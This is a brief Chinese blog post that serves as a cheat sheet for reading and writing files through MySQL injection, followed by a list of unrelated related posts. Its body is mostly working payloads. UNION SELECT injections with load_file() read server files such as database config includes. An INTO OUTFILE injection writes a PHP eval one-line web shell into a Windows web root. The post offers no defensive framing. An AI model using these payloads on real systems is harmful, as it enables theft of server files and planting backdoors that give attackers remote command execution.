mysql注入读写文件

程序员新玲技术 2022年11月10日

0 收藏 323 点赞 4,426 浏览 286 个字

mysql <5.0

读文件：load_file()

sql-shell select load_file(”);

d:/www/xx/index.php

/home/webroot/…../index.php

and 1=2 union select 1,load_file(‘c:\\..\\sql_inc.php’),3,4…….;

查看源代码

写文件：into outfile

and 1=2 union select 1,”<?php @eval($_post[‘cmd’]);?>”,3,4 into outfile(‘c:/Inetpub/wwwroot/xxxxx/test.php’)

程序员新玲

贡献者

上一篇： Features

相关推荐

adodb：我们领导推荐的数据库连接组件bsddb3：BerkeleyDB的连接组件Cheetah-1.0：我比较喜欢这个版本的cheeta…

程序员润宾技术

日期：2022-11-24 点赞：878 阅读：9,494

C. Hard Process题目连接：http://www.codeforces.com/contest/660/problem/CDes…

程序员春广技术

日期：2022-11-24 点赞：807 阅读：5,907

zengkefu@server1:/usr/src$ uname -aLinux server1 4.10.0-19-generic #21…

程序员峰军技术

日期：2022-11-24 点赞：569 阅读：6,740

可用Active Desktop Calendar V7.86 注册码序列号Name: www.greendown.cn Code: &nb…

程序员天赐技术

日期：2022-11-24 点赞：733 阅读：6,495

Android调用系统相机和自定义相机实例本博文主要是介绍了android上使用相机进行拍照并显示的两种方式，并且由于涉及到要把拍到的照片显…

程序员爱鹏技术

日期：2022-11-24 点赞：512 阅读：8,133

一、Struts2的获取　　Struts的官方网站为：http://struts.apache.org/　　下载完Struts2的jar包,…

程序员红卫技术

日期：2022-11-24 点赞：671 阅读：5,297